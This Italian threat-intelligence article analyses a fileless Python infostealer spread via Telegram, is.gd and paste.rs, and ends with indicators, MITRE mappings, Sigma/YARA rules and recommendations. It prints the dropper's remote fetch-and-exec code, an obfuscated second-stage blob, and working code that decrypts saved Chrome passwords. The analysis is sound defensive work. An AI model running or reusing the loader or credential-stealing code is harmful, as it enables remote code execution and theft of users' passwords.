Red Hot Cyber
La cybersecurity è condivisione. Riconosci il rischio, combattilo, condividi le tue esperienze ed incentiva gli altri a fare meglio di te.
Cerca
Un nuovo infostealer fileless viene veicolato da Telegram e dai servizi legittimi

Un nuovo infostealer fileless viene veicolato da Telegram e dai servizi legittimi

Agostino Pellegrino : 26 Giugno 2025 15:12

TLP: AMBER
Analista: Agostino Pellegrino, Crescenzo Cuoppolo, Alessio Bandini
Data ultima revisione: 2025-06-24

Questo report tecnico forense documenta l’analisi completa di un infostealer multi-stadio veicolato tramite un loader fileless in Python, identificato con la sigla “AP”. L’intera catena di infezione è eseguita in memoria e sfrutta servizi legittimi pubblici (Telegram, is.gd, paste.rs) per evitare la rilevazione e semplificare l’aggiornamento remoto del payload.

Il file iniziale, denominato Photos, contiene un dropper che esegue dinamicamente un secondo stadio offuscato, il quale a sua volta decodifica ed esegue in memoria un infostealer capace di esfiltrare informazioni sensibili da browser Chromium.

Catena di Infezione

Stadio 1 – Dropper Iniziale




Scarica Gratuitamente Byte The Silence, il fumetto sul Cyberbullismo di Red Hot Cyber

"Il cyberbullismo è una delle minacce più insidiose e silenziose che colpiscono i nostri ragazzi. Non si tratta di semplici "bravate online", ma di veri e propri atti di violenza digitale, capaci di lasciare ferite profonde e spesso irreversibili nell’animo delle vittime. 
Non possiamo più permetterci di chiudere gli occhi". Così si apre la prefazione del fumetto di Massimiliano Brolli, fondatore di Red Hot Cyber, un’opera che affronta con sensibilità e realismo uno dei temi più urgenti della nostra epoca.
 Distribuito gratuitamente, questo fumetto nasce con l'obiettivo di sensibilizzare e informare. È uno strumento pensato per scuole, insegnanti, genitori e vittime, ma anche per chi, per qualsiasi ragione, si è ritrovato nel ruolo del bullo, affinché possa comprendere, riflettere e cambiare. 
Con la speranza che venga letto, condiviso e discusso, Red Hot Cyber è orgogliosa di offrire un contributo concreto per costruire una cultura digitale più consapevole, empatica e sicura. Contattaci tramite WhatsApp al numero 375 593 1011 per richiedere ulteriori informazioni oppure alla casella di posta [email protected]


Supporta Red Hot Cyber attraverso: 

  1. L'acquisto del fumetto sul Cybersecurity Awareness
  2. Ascoltando i nostri Podcast
  3. Seguendo RHC su WhatsApp
  4. Seguendo RHC su Telegram
  5. Scarica gratuitamente “Byte The Silence”, il fumetto sul Cyberbullismo di Red Hot Cyber

Se ti piacciono le novità e gli articoli riportati su di Red Hot Cyber, iscriviti immediatamente alla newsletter settimanale per non perdere nessun articolo. La newsletter generalmente viene inviata ai nostri lettori ad inizio settimana, indicativamente di lunedì.

Il file Photos contiene codice Base64 offuscato:

___________ = 'ADN_UZJomrp3vPMujoH4bot'; exec(__import__('base64').b64decode('...'))

Decodifica del codice:

import requests, re
exec(
    requests.get(
        requests.head(
            f'https://is.gd/{match.group(1)}', allow_redirects=True
        ).url
    ).text
)

if (
    match := re.search(
        r'<meta property="og:description" content="([^"]+)",
        requests.get('https://t.me/ADN_UZJomrp3vPMujoH4bot').text
    )
) else None

Funzionamento:

  • Recupera da un canale Telegram un codice og:description (es. fVmzS)
  • Usa is.gd per risolvere il link accorciato
  • Recupera un payload da paste.rs ed esegue dinamicamente

Stadio 2 – Loader Offuscato

Contenuto scaricato da https://paste.rs/fVmzS. Esegue la seguente catena:

exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b85decode("c$|c~*|PFlk|y|1XNVIgA|vOF$g0Ys7>c3D)_@p{S!e)(1e%eo3lNe(LIXmGNenkpZCz$<ebH}_d0B7KPtXtWzd^o2U$yo=Cn~bSth+a+<*uc*mX^DJ?#rEx{^3vlz9d&KxsLwF4<C#V#z*&q`V;-Aetf5&)KBm9v-<g+eo?=?({I#o-s!jMx9{{j^}Bcaz54w-{e}9Aclv|+!#n+@`pb9vqx$1J{gwKwgnn{=?fsehXCL3*`Pu#C{YL%GJO9P~bMG"))))

Dopo b85 → zlib → marshal, è necessario un ulteriore passaggio:

decoded = bytearray([b ^ 0x04 for b in payload_bytes])

Il risultato è un bytecode deoffuscato eseguibile direttamente in memoria:

import os, shutil, zipfile, sqlite3
from Cryptodome.Cipher import AES
import win32crypt
import json
import base64

# Estrazione dati da Chromium (semplificato)

def get_chrome_data():
    local_state_path = os.path.expanduser('~') + r"\AppData\Local\Google\Chrome\User Data\Local State"
    with open(local_state_path, "r", encoding="utf-8") as f:
        local_state = json.loads(f.read())
    key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])[5:]
    key = win32crypt.CryptUnprotectData(key, None, None, None, 0)[1]
    login_data_path = os.path.expanduser('~') + r"\AppData\Local\Google\Chrome\User Data\Default\Login Data"
    shutil.copy2(login_data_path, "Loginvault.db")
    conn = sqlite3.connect("Loginvault.db")
    cursor = conn.cursor()
    cursor.execute("SELECT origin_url, username_value, password_value FROM logins")
    for row in cursor.fetchall():
        login_url = row[0]
        username = row[1]
        password = win32crypt.CryptUnprotectData(row[2])[1].decode()
        print(f"URL: {login_url}\nUsername: {username}\nPassword: {password}\n")
    cursor.close()
    conn.close()
    os.remove("Loginvault.db")
get_chrome_data()

Stadio 3 – Infostealer

Il codice risultante:

  • Raccoglie credenziali, cookie, cronologia e carte da Chromium
  • Cattura fingerprinting del sistema
  • Comprimi dati in archivio .zip
  • Prepara e invia l’esfiltrazione verso un server remoto (C2)

Indicatori di Compromissione

TipoValore
SHA256 (Photos)06a882d2b7e17a84d2707b2a2a5a27b0b18dc6cf503a694295bfcd6fe98a3a39
Telegramhttps://t.me/ADN_UZJomrp3vPMujoH4bot
is.gdhttps://is.gd/fVmzS → https://paste.rs/fVmzS

Tecniche MITRE ATT&CK

  • T1059 – Command and Scripting Interpreter
  • T1027 – Obfuscated Files or Information
  • T1071.001 – Web Protocols
  • T1082 – System Information Discovery
  • T1567.002 – Exfiltration over Web Services
  • T1218.010 – Proxy Execution (custom variant)

Rilevazione

Sigma Rule

title: Python Fileless Loader via Telegram and is.gd
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image: '*\python.exe'
    CommandLine|contains:
      - requests.get(
      - exec(
      - t.me/
      - is.gd/
  condition: selection
level: high
description: Rileva dropper Python fileless con payload remote

YARA Rule

rule Fileless_Telegram_Loader {
    meta:
        description = "Rileva loader fileless basato su Telegram + is.gd"
        author = "Agostino Pellegrino (apinfosec.com)"
        version = "1.1"
        date = "2025-06-24"
    strings:
        $a = "exec(requests.get(" ascii
        $b = "https://t.me/" ascii
        $c = "https://is.gd/" ascii
        $d = "og:description" ascii
    condition:
        all of them and filesize < 500KB
}

Raccomandazioni

  • Isolare ambienti Python non gestiti
  • Bloccare traffico a t.me, is.gd, paste.rs ove non necessario
  • Attivare logging avanzato su processi RAM-residenti
  • Applicare detection YARA e Sigma in EDR/SIEM
  • Segnalare a CSIRT nazionale

Conclusioni

L’analisi tecnica condotta ha evidenziato l’elevato livello di sofisticazione dell’infostealer “AP”, capace di operare completamente in memoria, eludendo gran parte dei meccanismi di rilevamento tradizionali. La catena d’infezione multi-stadio utilizza un dropper fileless scritto in Python e sfrutta servizi pubblici legittimi — come Telegram, is.gd e paste.rs — per veicolare, aggiornare e rendere dinamico il payload finale.

Il secondo stadio, fortemente offuscato, culmina nell’esecuzione di un infostealer con capacità avanzate di esfiltrazione dati da browser Chromium-based, comprese credenziali salvate, cookie, cronologia e informazioni sensibili.

L’uso creativo e malevolo di meccanismi comuni (come i meta tag HTML, URL accorciati e servizi di messaggistica) rende questa minaccia particolarmente insidiosa, dimostrando una crescente tendenza all’abuso di infrastrutture legittime per finalità illecite.

Le tecniche MITRE ATT&CK individuate confermano il comportamento stealth e modulare del malware. L’adozione di meccanismi di rilevazione specifici, come regole Sigma e YARA personalizzate, è fondamentale per mitigare efficacemente questa minaccia. Inoltre, l’implementazione di policy restrittive e il monitoraggio continuo degli ambienti Python non gestiti rappresentano misure difensive prioritarie.

Questo caso studio rappresenta un chiaro esempio dell’evoluzione dei moderni infostealer verso architetture completamente fileless, con capacità di persistenza e aggiornamento che richiedono una risposta difensiva altrettanto dinamica e proattiva.

Agostino Pellegrino
E’ un libero professionista, insegnante e perito di informatica Forense, Cyber Security ed Ethical Hacking e Network Management. Ha collaborato con importanti istituti di formazione a livello internazionale e ha esercitato teaching e tutorship in tecniche avanzate di Offensive Security per la NATO ottenendo importanti riconoscimenti dal Governo degli Stati Uniti. Il suo motto è “Studio. Sempre”.

Lista degli articoli

Articoli in evidenza

Zero-Day in Oracle E-Business Suite sotto attacco: Clop Sfrutta il CVE-2025-61882
Di Redazione RHC - 10/10/2025

La scorsa settimana, Oracle ha avvisato i clienti di una vulnerabilità zero-day critica nella sua E-Business Suite (CVE-2025-61882), che consente l’esecuzione remota di codice arbitrario senza aute...

Gli hacker etici italiani primi sul podio all’European Cybersecurity Challenge 2025
Di Redazione RHC - 09/10/2025

Dal 6 al 9 ottobre 2025, Varsavia è stata teatro della 11ª edizione della European Cybersecurity Challenge (ECSC). In un confronto serrato tra 39 team provenienti da Stati membri UE, Paesi EFTA, can...

1000 POS di negozi USA e UK violati e messi all’asta: “accesso totale” a 55.000 dollari
Di Redazione RHC - 09/10/2025

Un nuovo annuncio pubblicato su un forum underground è stato rilevato poco fa dai ricercatori del laboratorio di intelligence sulle minacce di Dark Lab e mostra chiaramente quanto sia ancora attivo e...

Allenza tra gruppi ransomware: LockBit, DragonForce e Qilin uniscono le forze
Di Redazione RHC - 09/10/2025

Tre importanti gruppi di ransomware – DragonForce, Qilin e LockBit – hanno annunciato un’alleanza. Si tratta essenzialmente di un tentativo di coordinare le attività di diversi importanti opera...

Arriva Google CodeMender! Quando l’AI, trova il bug nel codice e lo ripara da sola
Di Redazione RHC - 07/10/2025

Sarebbe fantastico avere un agente AI capace di analizzare automaticamente il codice dei nostri progetti, individuare i bug di sicurezza, generare la correzione e pubblicarla subito in produzione. Epp...